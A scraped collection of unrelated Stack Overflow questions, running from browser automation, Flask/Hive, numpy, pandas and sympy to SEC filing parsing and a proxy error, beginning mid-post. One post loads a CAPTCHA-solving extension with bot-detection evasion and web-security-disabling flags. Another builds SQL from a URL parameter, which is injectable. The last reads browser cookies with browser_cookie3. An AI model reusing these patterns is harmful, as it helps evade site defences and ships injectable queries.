<p><a href="https://i.sstatic.net/V0FQGn6t.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/V0FQGn6t.png" alt="blank screen post-login" /></a></p>
|
<python><docker><docker-compose><odoo><odoo-16>
|
2025-01-17 08:26:38
| 0
| 1,221
|
AchrafBj
|
79,363,972
| 20,770,190
|
How to load and use an extension within Browser-use?
|
<p>I'm using <a href="https://github.com/browser-use/browser-use" rel="nofollow noreferrer">browser-use</a> for web automation. This package uses playwright under the hood. I realized it is not possible to load an extension in incognito mode, so I must use <code>playwright.chromium.launch_persistent_context</code> instead of <code>playwright.chromium.launch</code>. But <code>browser-use</code> uses <code>playwright.chromium.launch</code>. So I wanted to override the <a href="https://github.com/browser-use/browser-use/blob/main/browser_use/browser/browser.py#L60" rel="nofollow noreferrer">Browser class</a> to change this and load my extension there. However, with the following code I have written so far, it gets stuck and the Chromium instance isn't run like the normal mode:</p>
<pre class="lang-py prettyprint-override"><code>import asyncio
import os
from browser_use import Agent, BrowserConfig, Browser
from browser_use.browser.browser import logger
from langchain_openai import ChatOpenAI
from playwright.async_api import async_playwright, Playwright
extension_path = "/path/to/capsolver-extension"
class CustomBrowser(Browser):
async def _setup_browser(self, playwright: Playwright):
"""Sets up and returns a Playwright Browser instance with persistent context."""
if self.config.wss_url:
browser = await playwright.chromium.connect(self.config.wss_url)
return browser
elif self.config.chrome_instance_path:
import subprocess
import requests
try:
# Check if browser is already running
response = requests.get('http://localhost:9222/json/version', timeout=2)
if response.status_code == 200:
logger.info('Reusing existing Chrome instance')
browser = await playwright.chromium.connect_over_cdp(
endpoint_url='http://localhost:9222',
timeout=20000, # 20 second timeout for connection
)
return browser
except requests.ConnectionError:
logger.debug('No existing Chrome instance found, starting a new one')
# Start a new Chrome instance
subprocess.Popen(
[
self.config.chrome_instance_path,
'--remote-debugging-port=9222',
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
# Attempt to connect again after starting a new instance
try:
browser = await playwright.chromium.connect_over_cdp(
endpoint_url='http://localhost:9222',
timeout=20000, # 20 second timeout for connection
)
return browser
except Exception as e:
logger.error(f'Failed to start a new Chrome instance.: {str(e)}')
raise RuntimeError(
' To start chrome in Debug mode, you need to close all existing Chrome instances and try again otherwise we can not connect to the instance.'
)
else:
try:
disable_security_args = []
if self.config.disable_security:
disable_security_args = [
'--disable-web-security',
'--disable-site-isolation-trials',
'--disable-features=IsolateOrigins,site-per-process',
]
# Use launch_persistent_context instead of launch
user_data_dir = os.path.join(os.getcwd(), "user_data") # Specify the path to the user data directory
browser_context = await playwright.chromium.launch_persistent_context(
user_data_dir=user_data_dir,
headless=self.config.headless,
args=[
'--no-sandbox',
'--disable-blink-features=AutomationControlled',
'--disable-infobars',
'--disable-background-timer-throttling',
'--disable-popup-blocking',
'--disable-backgrounding-occluded-windows',
'--disable-renderer-backgrounding',
'--disable-window-activation',
'--disable-focus-on-load',
'--no-first-run',
'--no-default-browser-check',
'--no-startup-window',
'--window-position=0,0',
# f"--disable-extensions-except={extension_path}",
# f'--load-extension={extension_path}', # Load the extension
]
+ disable_security_args
+ self.config.extra_chromium_args,
proxy=self.config.proxy,
)
return browser_context
except Exception as e:
logger.error(f'Failed to initialize Playwright browser: {str(e)}')
raise
config = BrowserConfig(
extra_chromium_args=[
f"--disable-extensions-except={extension_path}",
f"--load-extension={extension_path}",
"--disable-web-security", # Optional, for testing purposes
"--disable-site-isolation-trials"
]
)
browser = CustomBrowser(config=config)
async def main():
# custom_browser = CustomBrowser(config=BrowserConfig())
agent = Agent(
task="Go to Reddit, search for 'browser-use' in the search bar, click on the first post and return the first comment.",
llm=ChatOpenAI(model="gpt-4o"),
browser=browser,
)
result = await agent.run()
print(result)
asyncio.run(main())
</code></pre>
<p>Error raised after it has been stuck for a while:</p>
<pre><code>INFO [browser_use] BrowserUse logging setup complete with level info
INFO [root] Anonymized telemetry enabled. See https://github.com/gregpr07/browser-use for more information.
INFO [agent] 🚀 Starting task: Go to google flight and book a flight from New York to Los Angeles
INFO [agent]
📍 Step 1
ERROR [browser] Failed to initialize Playwright browser: BrowserType.launch_persistent_context: Timeout 180000ms exceeded.
Call log:
- <launching> /home/benyamin/.cache/ms-playwright/chromium-1148/chrome-linux/chrome --disable-field-trial-config --disable-background-networking --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-back-forward-cache --disable-breakpad --disable-client-side-phishing-detection --disable-component-extensions-with-background-pages --disable-component-update --no-default-browser-check --disable-default-apps --disable-dev-shm-usage --disable-extensions --disable-features=ImprovedCookieControls,LazyFrameLoading,GlobalMediaControls,DestroyProfileOnBrowserClose,MediaRouter,DialMediaRouteProvider,AcceptCHFrame,AutoExpandDetailsElement,CertificateTransparencyComponentUpdater,AvoidUnnecessaryBeforeUnloadCheckSync,Translate,HttpsUpgrades,PaintHolding,ThirdPartyStoragePartitioning,LensOverlay,PlzDedicatedWorker --allow-pre-commit-input --disable-hang-monitor --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --force-color-profile=srgb --metrics-recording-only --no-first-run --enable-automation --password-store=basic --use-mock-keychain --no-service-autorun --export-tagged-pdf --disable-search-engine-choice-screen --unsafely-disable-devtools-self-xss-warnings --no-sandbox --no-sandbox --disable-blink-features=AutomationControlled --disable-infobars --disable-background-timer-throttling --disable-popup-blocking --disable-backgrounding-occluded-windows --disable-renderer-backgrounding --disable-window-activation --disable-focus-on-load --no-first-run --no-default-browser-check --no-startup-window --window-position=0,0 --disable-web-security --disable-site-isolation-trials --disable-features=IsolateOrigins,site-per-process --disable-extensions-except=/home/benyamin/PycharmProjects/stack/capsolver-extension --load-extension=/home/benyamin/PycharmProjects/stack/capsolver-extension --disable-web-security --disable-site-isolation-trials --user-data-dir=/home/benyamin/PycharmProjects/stack/user_data --remote-debugging-pipe about:blank
- - <launched> pid=683538
- - [pid=683538][err] [683538:683538:0117/224944.131425:ERROR:service_worker_task_queue.cc(196)] DidStartWorkerFail nbdgbpgkphcgkjiadleadooiojilllaj: 5
- - [pid=683538][err] [683538:683538:0117/224944.167807:ERROR:service_worker_task_queue.cc(196)] DidStartWorkerFail nbdgbpgkphcgkjiadleadooiojilllaj: 5
- - [pid=683538][err] [683538:683549:0117/224947.134480:ERROR:nss_util.cc(345)] After loading Root Certs, loaded==false: NSS error code: -8018
- - [pid=683538][err] [685058:685058:0117/225144.025929:ERROR:gpu_blocklist.cc(71)] Unable to get gpu adapter
WARNING [browser] Page load failed, continuing...
</code></pre>
|
<python><google-chrome-extension><playwright><playwright-python><browser-use>
|
2025-01-17 07:43:54
| 1
| 301
|
Benjamin Geoffrey
|
79,363,898
| 9,648,895
|
How to extract text content under an XML tag using beautifulsoup
|
<p>I have an XML file that looks like this:</p>
<pre><code><sec id="sec2.1">
<title>Study design</title>
<p id="p0055">
This is a secondary analysis of the Childhood Acute Illness and Nutrition (CHAIN) Network prospective cohort which, between November 2016 and January 2019, recruited 3101 children at nine hospitals in Africa and South Asia: Dhaka and Matlab Hospitals (Bangladesh), Banfora Referral Hospital (Burkina Faso), Kilifi County, Mbagathi County and Migori County Hospitals (Kenya), Queen Elizabeth Hospital (Malawi), Civil Hospital (Pakistan), and Mulago National Referral Hospital (Uganda). As described in the published study protocol,
<xref rid="bib11" ref-type="bibr">
<sup>11</sup>
</xref>
children were followed throughout hospital admission and after discharge with follow-up visits at 45, 90 and 180-days post-discharge. Catchment settings differed in urbanisation, access to health care and prevalence of background comorbidities such as HIV and malaria. Prior to study start, sites were audited to optimise care as per national and World Health Organisation (WHO) guidelines.
<xref rid="bib12" ref-type="bibr">
<sup>12</sup>
</xref>
Cross-network harmonisation of clinical definitions and methods was prioritised through staff training and the use of standard operation procedures and case report forms (available online,
<ext-link ext-link-type="uri" xlink:href="https://chainnetwork.org/resources/" id="intref0010">https://chainnetwork.org/resources/</ext-link>
).
</p>
</sec>
</code></pre>
<p>How can I extract the text in the <code><p id="p0055"></code> element using BeautifulSoup?</p>
<p>Approaching this problem with the code below seems not to work.</p>
<pre><code>from bs4 import BeautifulSoup

with open('test.xml', 'r') as file:
soup = BeautifulSoup(file, 'xml')
# Find and print all tags
for tag in soup.find_all('sec'):
print(tag.text)
</code></pre>
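<p>For reference, this is roughly the targeted lookup I am aiming for (a sketch I have not verified; it assumes the paragraph can be found directly by its <code>id</code> attribute):</p>
<pre><code>from bs4 import BeautifulSoup

with open('test.xml', 'r') as file:
    soup = BeautifulSoup(file, 'xml')

# Locate the <p> element by its id and print only its text content
para = soup.find('p', attrs={'id': 'p0055'})
if para is not None:
    print(para.get_text(' ', strip=True))
</code></pre>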
|
<python><xml><beautifulsoup><xml-parsing>
|
2025-01-17 07:08:02
| 1
| 306
|
Alex Maina
|
79,363,771
| 12,466,687
|
How to convert 2D networkx graph to interactive 3D in python?
|
<p>I have already built a network 2D graph using <code>networkx</code> in <code>python</code>.</p>
<p><strong>Code</strong> used to build:</p>
<pre><code>import pandas as pd
import matplotlib as mpl
import networkx as nx
links_data = pd.read_csv("https://raw.githubusercontent.com/johnsnow09/network_graph/refs/heads/main/links_filtered.csv")
G = nx.from_pandas_edgelist(links_data, 'var1', 'var2')
cmap = mpl.colormaps['Set3'].colors # this has 12 colors for 11 categories
cat_colors = dict(zip(links_data['Category'].unique(), cmap))
colors = (links_data
.drop_duplicates('var1').set_index('var1')['Category']
.map(cat_colors)
.reindex(G.nodes)
)
nx.draw(G, with_labels=True, node_color=colors, node_size=200,
edge_color='black', linewidths=.5, font_size=2.5)
</code></pre>
<p>It gives below image as output
<a href="https://i.sstatic.net/4aqC9UuL.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/4aqC9UuL.png" alt="enter image description here" /></a></p>
<p>How can I convert it into a <code>3D</code> graph so that I can get a better view of the network relations in the graph?</p>
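<p>What I have in mind is something along the lines of the sketch below - computing a 3D layout and handing it to an interactive library such as plotly (plotly is just my assumption here, and I have not verified this code):</p>
<pre><code>import networkx as nx
import plotly.graph_objects as go

# Compute node positions in three dimensions
pos = nx.spring_layout(G, dim=3, seed=42)

# Build edge coordinates (None separates individual edges)
edge_x, edge_y, edge_z = [], [], []
for u, v in G.edges():
    edge_x += [pos[u][0], pos[v][0], None]
    edge_y += [pos[u][1], pos[v][1], None]
    edge_z += [pos[u][2], pos[v][2], None]

node_x = [pos[n][0] for n in G.nodes()]
node_y = [pos[n][1] for n in G.nodes()]
node_z = [pos[n][2] for n in G.nodes()]

fig = go.Figure(data=[
    go.Scatter3d(x=edge_x, y=edge_y, z=edge_z, mode='lines',
                 line=dict(color='black', width=1), hoverinfo='none'),
    go.Scatter3d(x=node_x, y=node_y, z=node_z, mode='markers',
                 text=list(G.nodes()), hoverinfo='text', marker=dict(size=4)),
])
fig.show()
</code></pre>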
<p>Appreciate any help!</p>
|
<python><3d><networkx>
|
2025-01-17 06:00:47
| 1
| 2,357
|
ViSa
|
79,363,724
| 5,093,602
|
Display the hive table results in UI using flask
|
<p>I am new to Flask.
I have a Hive table called <code>database_table</code> with the following fields:</p>
<div class="s-table-container"><table class="s-table">
<thead>
<tr>
<th>id</th>
<th>field_id</th>
<th>table_name</th>
<th>schema_name</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>1</td>
<td>employee_table</td>
<td>employee</td>
</tr>
<tr>
<td>2</td>
<td>2</td>
<td>department_table</td>
<td>employeee</td>
</tr>
<tr>
<td>3</td>
<td>3</td>
<td>statistics_table</td>
<td>employeee</td>
</tr>
</tbody>
</table></div>
<p>Based on this <code>database_table</code>, when a <code>field_id</code> is selected, the corresponding table should be queried and its results shown in the UI via Flask. For example, when <code>field_id = 1</code> is selected, the table name should be looked up in <code>database_table</code>, the <code>employee_table</code> should be queried, and its results displayed in the UI.</p>
<p>I have the following code:</p>
<pre class="lang-py prettyprint-override"><code>from pyhive import hive
from flask import current_app
try:
from flask import _app_ctx_stack as stack
except ImportError:
from flask import _request_ctx_stack as stack
class Hive(object):
def __init__(self, app=None):
self.app = app
if app is not None:
self.init_app(app)
def init_app(self, app):
# Use the newstyle teardown_appcontext if it's available,
# otherwise fall back to the request context
if hasattr(app, 'teardown_appcontext'):
app.teardown_appcontext(self.teardown)
else:
app.teardown_request(self.teardown)
def connect(self):
return hive.connect(current_app.config['HIVE_DATABASE_URI'], database="orc")
def teardown(self, exception):
ctx = stack.top
if hasattr(ctx, 'hive_db'):
ctx.hive_db.close()
return None
@property
def connection(self):
ctx = stack.top
if ctx is not None:
if not hasattr(ctx, 'hive_db'):
ctx.hive_db = self.connect()
return ctx.hive_db
@blueprint.route('/hive/<limit>')
def connect_to_hive(limit):
cur = hive.connection.cursor()
query = "select table_name from database_table where field_id=1 {0}".format(limit)
cur.execute(query)
res = cur.fetchall()
return jsonify(data=res)
</code></pre>
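<p>Conceptually, what I am trying to achieve is the two-step lookup sketched below (only an illustration of the intent - the route name and the row limit are made up, and it reuses the <code>hive</code> and <code>blueprint</code> objects from above):</p>
<pre class="lang-py prettyprint-override"><code>from flask import jsonify


@blueprint.route('/table/<int:field_id>')
def show_table(field_id):
    cur = hive.connection.cursor()

    # Step 1: look up which table belongs to the selected field_id
    cur.execute(
        "select table_name, schema_name from database_table where field_id = {0}".format(field_id)
    )
    row = cur.fetchone()
    if row is None:
        return jsonify(error="unknown field_id"), 404
    table_name, schema_name = row

    # Step 2: query that table and return its rows to the UI
    cur.execute("select * from {0}.{1} limit 100".format(schema_name, table_name))
    rows = cur.fetchall()
    columns = [col[0] for col in cur.description]
    return jsonify(columns=columns, data=rows)
</code></pre>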
|
<python><sql><flask><flask-sqlalchemy>
|
2025-01-17 05:33:39
| 0
| 5,901
|
Chanukya
|
79,363,512
| 10,732,351
|
Why do my row-major vs. column-major and iteration vs. index-based array access tests produce unexpected results?
|
<p>I'm reading the book <em>Designing Machine Learning Systems by Chip Huyen</em> (<a href="https://rads.stackoverflow.com/amzn/click/com/1098107969" rel="nofollow noreferrer" rel="nofollow noreferrer">Amazon Link</a>). In Chapter 3, section <em>Row-Major Versus Column-Major Format</em>, the book explains that for row-major arrays, accessing data by rows should be faster than by columns, and vice versa for column-major arrays.</p>
<p>However, when I wrote some test cases, the results surprised me. I have two questions:</p>
<ol>
<li><p>My results show that the array's major order does not seem to affect the access speed, which is unexpected. Why is this happening?</p>
</li>
<li><p>I tested two methods to access the array: index-based access and iteration. I expected them to have the same performance since both have the same complexity. However, my results show that the iteration method outperforms index-based access. Why is this the case?</p>
</li>
</ol>
<p>Here’s the code I used for testing:</p>
<pre class="lang-py prettyprint-override"><code>from time import perf_counter
import numpy as np
def test_column_access_numpy_index(array):
n_row, n_col = array.shape
start = perf_counter()
for j in range(n_col):
for i in range(n_row):
_ = array[i, j]
return perf_counter() - start
def test_row_access_numpy_index(array):
n_row, n_col = array.shape
start = perf_counter()
for i in range(n_row):
for j in range(n_col):
_ = array[i, j]
return perf_counter() - start
def test_column_access_numpy_iteration(array):
n_row, n_col = array.shape
start = perf_counter()
for j in range(n_col):
for item in array[:, j]:
pass
return perf_counter() - start
def test_row_access_numpy_iteration(array):
n_row, n_col = array.shape
start = perf_counter()
for i in range(n_row):
for item in array[i]:
pass
return perf_counter() - start
if __name__=='__main__':
size = 10_000
row_major = np.ones((size, size), dtype=np.float32, order='C')
col_major = np.ones((size, size), dtype=np.float32, order='F')
print("Warm up")
test_row_access_numpy_iteration(row_major)
print("Input row major")
time = test_row_access_numpy_index(row_major)
print(f"Testing row access index in numpy: {time:.6f} seconds")
time = test_column_access_numpy_index(row_major)
print(f"Testing column access index in numpy: {time:.6f} seconds")
time = test_row_access_numpy_iteration(row_major)
print(f"Testing row access iteration in numpy: {time:.6f} seconds")
time = test_column_access_numpy_iteration(row_major)
print(f"Testing column access iteration in numpy: {time:.6f} seconds")
print('----------------------------')
print("Input col major")
time = test_row_access_numpy_index(col_major)
print(f"Testing row access index in numpy: {time:.6f} seconds")
time = test_column_access_numpy_index(col_major)
print(f"Testing column access index in numpy: {time:.6f} seconds")
time = test_row_access_numpy_iteration(col_major)
print(f"Testing row access iteration in numpy: {time:.6f} seconds")
time = test_column_access_numpy_iteration(col_major)
print(f"Testing column access iteration in numpy: {time:.6f} seconds")
</code></pre>
<p>Here is the output result</p>
<pre><code>Warm up
Input row major
Testing row access index in numpy: 7.732731 seconds
Testing column access index in numpy: 8.025850 seconds
Testing row access iteration in numpy: 3.111501 seconds
Testing column access iteration in numpy: 3.129321 seconds
----------------------------
Input col major
Testing row access index in numpy: 7.852834 seconds
Testing column access index in numpy: 7.978318 seconds
Testing row access iteration in numpy: 3.027528 seconds
Testing column access iteration in numpy: 3.075494 seconds
</code></pre>
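<p>For context, I also considered timing a vectorized reduction instead of Python-level loops, since I expected the layout effect to show up only when NumPy itself walks the memory (a rough sketch, not results I have verified):</p>
<pre class="lang-py prettyprint-override"><code>from time import perf_counter
import numpy as np

size = 10_000
row_major = np.ones((size, size), dtype=np.float32, order='C')
col_major = np.ones((size, size), dtype=np.float32, order='F')

for name, arr in [('C order', row_major), ('F order', col_major)]:
    start = perf_counter()
    arr.sum(axis=1)  # reduce along rows (contiguous for C order)
    row_time = perf_counter() - start

    start = perf_counter()
    arr.sum(axis=0)  # reduce along columns (contiguous for F order)
    col_time = perf_counter() - start

    print(f"{name}: sum over rows {row_time:.4f}s, sum over columns {col_time:.4f}s")
</code></pre>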
|
<python><arrays><numpy>
|
2025-01-17 02:56:44
| 2
| 1,306
|
CuCaRot
|
79,363,433
| 2,635,863
|
convert multi-index column to single column in dataframe
|
<pre><code>import pandas as pd
columns = pd.MultiIndex.from_tuples(
[('A', 'one'), ('A', 'two'), ('B', 'one'), ('B', 'two'), ('C', '')],
names=[None, 'number'])
df = pd.DataFrame([[1, 2, 3, 4, 'X'], [5, 6, 7, 8, 'Y']], columns=columns)
A B C
number one two one two
0 1 2 3 4 X
1 5 6 7 8 Y
</code></pre>
<p>I'd like to remove the multi-index by making <code>number</code> a column:</p>
<pre><code>A B C number
1 3 X one
5 7 Y one
2 4 X two
6 8 Y two
</code></pre>
<p>I tried extracting the values with <code>df[[('number', ('A','one')]]</code> so that I can assign them to individual columns, but it doesn't work.</p>
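<p>The closest idea I have had - though I have not managed to verify it - is to move <code>C</code> into the index and stack the <code>number</code> level, roughly:</p>
<pre><code>out = (
    df.set_index(('C', ''))      # move the single-level C column out of the way
      .rename_axis('C')
      .stack(level='number')     # turn the 'one'/'two' level into rows
      .reset_index()
      .sort_values('number', kind='stable')
      [['A', 'B', 'C', 'number']]
)
print(out)
</code></pre>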
|
<python><pandas>
|
2025-01-17 01:38:51
| 1
| 10,765
|
HappyPy
|
79,363,424
| 5,128,398
|
Why a long line printed by python in gitbash or cygwin become broken (multiple) lines when being copy and pasted?
|
<p>I have a python program that prints some examples so that users can copy and paste to run. The examples are all long lines.</p>
<p>I noticed that when python printed a long line in gitbash, and then I copy and paste it to gitbash, the long line becomes multiple short lines.</p>
<p>The following is a test python script, test_long_line.py</p>
<pre><code>#!/usr/bin/env python
line = "echo cmd"
for i in range(0, 30):
line = f"{line} arg{i} "
print(line)
</code></pre>
<p>When I run it,</p>
<pre><code>$ test_long_line.py
echo cmd arg0 arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10 arg11 arg12 arg13 arg14 arg15 arg16 arg17 arg18 arg19 arg20 arg21 arg22 arg23 arg24 arg25 arg26 arg27 arg28
arg29
</code></pre>
<p>The printout looks like 1 line, wrapped around, but when I copy and paste to the same gitbash, gitbash sees it as broken lines</p>
<pre><code>$ echo cmd arg0 arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10 arg11 arg12 arg13 arg
14 arg15 arg16 arg17 arg18 arg19 arg20 arg21 arg22 arg23 arg24 arg25 arg26 arg27 arg28
arg29
cmd arg0 arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10 arg11 arg12 arg13 arg
bash: 14: command not found
bash: arg29: command not found
</code></pre>
<p>I did more experiments, and concluded:</p>
<ul>
<li>The same problem happens when python prints in Cygwin.</li>
<li>However, windows Batch (cmd.exe) doesn't have this problem.</li>
<li>Perl's print doesn't have this problem. (see perl test script below)</li>
<li>Bash's echo doesn't have this problem. (see bash test script below)</li>
<li>Linux (WSL2) terminal doesn't have this problem.</li>
</ul>
<p>My test environment:</p>
<ul>
<li>Windows 10 with latest patch</li>
<li>Python 3.12.4</li>
<li>Gitbash Mintty 3.7.1</li>
<li>Cygwin Mintty 3.7.4</li>
</ul>
<p>Perl test script, print_long_line.pl, which doesn't have the problem</p>
<pre><code>#!/usr/bin/env perl
use strict;
my $line = "echo cmd ";
for (my $i = 0; $i < 30; $i++) {
$line .= "arg$i ";
}
print "$line\n";
</code></pre>
<p>Bash test script, test_long_line.bash, which doesn't have the problem</p>
<pre><code>#!/bin/bash
line="echo cmd"
for i in {0..29}; do
line+=" arg$i"
done
echo "$line"
</code></pre>
<p>I've been using Python for years, and it is only now that I have noticed this. I am not sure why Python does this.</p>
<p>Any insight is appreciated.</p>
|
<python><cygwin><git-bash>
|
2025-01-17 01:24:19
| 0
| 1,063
|
oldpride
|
79,363,421
| 4,080,181
|
How to simplify a linear system of equations by eliminating intermediate variables
|
<p>I have a linear system shown in the block diagram below.</p>
<p><a href="https://i.sstatic.net/TMyhhczJ.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/TMyhhczJ.png" alt="enter image description here" /></a></p>
<p>This system is described with the following set of linear equations:</p>
<pre><code>err = inp - fb
out = a * err
fb = f * out
</code></pre>
<p>I would like to use sympy to compute the output (<em>out</em>) as a function of the input (<em>inp</em>). Thus, I would like to eliminate the variables <em>err</em> and <em>fb</em>. I would like some help, as I have been unable to figure out how to express what I want. So far I have:</p>
<pre class="lang-py prettyprint-override"><code>from sympy import symbols, Eq, solve
inp, err, out, fb, a, f = symbols("inp err out fb a f")
eqns = [
Eq(err, inp - fb),
Eq(out, a * err),
Eq(fb, f * out),
]
solution = solve(eqns, [out])
solution
# []
</code></pre>
<p>That clearly does not work.</p>
<p>I thought perhaps <code>simplify()</code> might help here, but I don't know how to apply the simplify function to a system of equations.</p>
<p>The result I am hoping to achieve is:</p>
<pre><code> a
out = ------ * inp
1 + af
</code></pre>
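<p>One direction I have been considering, but have not confirmed, is to solve for all three unknowns at once so that <em>err</em> and <em>fb</em> are eliminated automatically:</p>
<pre class="lang-py prettyprint-override"><code>from sympy import symbols, Eq, solve, simplify

inp, err, out, fb, a, f = symbols("inp err out fb a f")

eqns = [
    Eq(err, inp - fb),
    Eq(out, a * err),
    Eq(fb, f * out),
]

# Solve for every intermediate variable, not just `out`
solution = solve(eqns, [out, err, fb], dict=True)[0]
print(simplify(solution[out]))   # hoping for: a*inp/(a*f + 1)
</code></pre>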
<p>Can anyone point me in the right direction?</p>
|
<python><math><sympy>
|
2025-01-17 01:19:41
| 2
| 548
|
August West
|
79,363,420
| 825,227
|
Running into an error using Pandas `read_html`: "ValueError: invalid literal for int() with base 10: '40%'"
|
<p>Have successfully used <code>pd.read_html</code> for a majority of webpages I'm scanning but the below throws the error referenced:</p>
<p>'https://sec.gov/Archives/edgar/data/320193/000032019323000048/xslF345X04/wf-form4_168064750462974.xml'</p>
<p>When I inspect the webpage source, I can see the offending <code>rowspan</code> assignment:</p>
<pre><code></table>
</td>
</tr>
<tr><td valign="top" rowspan="40%" colspan="50%"><span class="MedSmallFormText"><table width="100%" border="0" cellpadding="0" cellspacing="0"><tr><td>
Rule 10b5-1(c) Transaction Indication
</td></tr></table>
</code></pre>
<p>The webpage resolves correctly so clearly not an error, what's the remedy here?</p>
<p>Here is the code I'm using to parse this file, which raises the error:</p>
<pre><code>headers = {
"User-Agent": "Alias (alias118@gmail.com)",
"Accept-Encoding": "gzip, deflate"
"Host": "www.sec.gov"
}
filing_url = 'https://data.sec.gov/Archives/edgar/data/320193/000032019323000048/xslF345X04/wf-form4_168064750462974.xml'
x = requests.get(filing_url, headers=headers)
if x.status_code != 200:
print(f'Error loading xml for file:\n{filing_url}\nReason: {x.reason}')
else:
print(filing_url,'\n')
columns = [
'title',
'trade_date',
'execution_date',
'trade_code',
'trade_code_v',
'shares_traded',
'acq_code',
'price',
'shares_remaining',
'own_type',
'relationship'
]
try:
tbls = pd.read_html(x.content)
except:
pass
</code></pre>
<p>To contrast, the below file reads without issue:
'https://data.sec.gov/Archives/edgar/data/320193/000032019323000016/xslF345X03/wf-form4_167546711444862.xml'</p>
<p>(The data.sec.gov and sec.gov domains are used for API and web-based access, respectively.)</p>
|
<python><html><pandas>
|
2025-01-17 01:17:06
| 0
| 1,702
|
Chris
|
79,363,386
| 8,812,734
|
Is there a way of differentiating collapsed column in excel sheet via python
|
<p>I am reading an Excel sheet via Python and trying to read only the visible rows (not hidden or collapsed ones). I went through the documentation of <a href="https://openpyxl.readthedocs.io/en/stable/api/openpyxl.worksheet.dimensions.html" rel="nofollow noreferrer">OPENPYXL</a> and found that it has "hidden" and "collapsed" properties. However, once I read the sheet, "hidden" or "collapsed" is not always true when a column is hidden. My code is the following:</p>
<pre><code>import pandas as pd

def read_visible_data_from_sheet(sheet):
data = []
# Iterate through rows
for row in sheet.iter_rows():
row_num = row[0].row
# Check if the row is hidden or has height set to 0
row_hidden = sheet.row_dimensions[row_num].hidden
row_height = sheet.row_dimensions[row_num].height
row_level = sheet.row_dimensions[row_num].outlineLevel
if row_hidden or (row_height is not None and row_height == 0):
continue # Skip hidden rows
# Check if any parent row is collapsed
is_collapsed = False
for parent_row_num in range(1, row_num):
if sheet.row_dimensions[parent_row_num].outlineLevel < row_level and sheet.row_dimensions[parent_row_num].hidden == True:
is_collapsed = True
break
if is_collapsed:
continue # Skip collapsed rows
visible_row = []
# Iterate through columns in the row
for cell in row:
col_letter = cell.column_letter
col_dim = sheet.column_dimensions.get(col_letter)
if col_dim:
col_hidden = col_dim.hidden
col_width = col_dim.width
else:
continue
# Check if the column is hidden or has width set to 0
if col_hidden or (col_width is not None and col_width == 0):
continue # Skip hidden columns
visible_row.append(cell.value)
# Append the visible row to the data list
if visible_row: # Avoid adding empty rows
data.append(visible_row)
# Convert to a DataFrame
df = pd.DataFrame(data)
return df, sheet
</code></pre>
<p>In some cases <code>sheet.column_dimensions</code> contains columns that are visible, while in other cases a visible column does not appear in <code>sheet.column_dimensions</code> at all.</p>
<p>Is there a better way to deal with such cases? I am open on exploring any other library if necessary.</p>
|
<python><openpyxl><xlsx><xls><xlsm>
|
2025-01-17 00:41:40
| 1
| 317
|
Aaroosh Pandoh
|
79,363,266
| 2,846,766
|
How can I write zeros to a 2D numpy array by both row and column indices
|
<p>I have a large (90k x 90k) numpy ndarray and I need to zero out a block of it. I have a list of about 30k indices that indicate which rows <em>and</em> columns need to be zero. The indices aren't necessarily contiguous, so <code>a[min:max, min:max]</code> style slicing isn't possible.</p>
<p>As a toy example, I can start with a 2D array of non-zero values, but I can't seem to write zeros the way I expect.</p>
<pre class="lang-py prettyprint-override"><code>import numpy as np
a = np.ones((6, 8))
indices = [2, 3, 5]
</code></pre>
<pre class="lang-py prettyprint-override"><code># I thought this would work, but it does not.
# It correctly writes to (2,2), (3,3), and (5,5), but not all
# combinations of (2, 3), (2, 5), (3, 2), (3, 5), (5, 2), or (5, 3)
a[indices, indices] = 0.0
print(a)
[[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 0. 1. 1. 1. 1. 1.]
[1. 1. 1. 0. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 0. 1. 1.]]
</code></pre>
<pre class="lang-py prettyprint-override"><code># I thought this would fix that problem, but it doesn't change the array.
a[indices, :][:, indices] = 0.0
print(a)
[[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]]
</code></pre>
<p>In this toy example, I'm hoping for this result.</p>
<pre class="lang-py prettyprint-override"><code>[[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 0. 0. 1. 0. 1. 1.]
[1. 1. 0. 0. 1. 0. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 0. 0. 1. 0. 1. 1.]]
</code></pre>
<p>I could probably write a cumbersome loop or build some combinatorically huge list of indices to do this, but it seems intuitive that this must be supported in a cleaner way, I just can't find the syntax to make it happen. Any ideas?</p>
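<p>One idea I ran into while searching, but have not been able to confirm is the intended idiom, is building an open mesh from the index list:</p>
<pre class="lang-py prettyprint-override"><code>import numpy as np

a = np.ones((6, 8))
indices = [2, 3, 5]

# np.ix_ builds an open mesh, so every (row, col) combination from
# indices x indices gets addressed rather than only the diagonal pairs
a[np.ix_(indices, indices)] = 0.0
print(a)
</code></pre>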
|
<python><arrays><numpy><indices><numpy-slicing>
|
2025-01-16 23:03:35
| 1
| 8,122
|
mightypile
|
79,363,232
| 850,781
|
Cookies needed to connect to the proxy?
|
<p>I get</p>
<pre><code>ProxyError: HTTPSConnectionPool(host='XXX', port=443): Max retries exceeded with url: ZZZZZ (Caused by ProxyError('Unable to connect to proxy', OSError('Tunnel connection failed: 403 Forbidden')))
</code></pre>
<p>on</p>
<pre><code>import requests
requests.get(base_url, proxies=proxies, headers=headers, cookies=cookies_ff)
</code></pre>
<p>where</p>
<pre><code>import browser_cookie3
cookies_ff = browser_cookie3.firefox(domain_name='XXX') # 50 cookies
</code></pre>
<p>but <strong>not</strong> with</p>
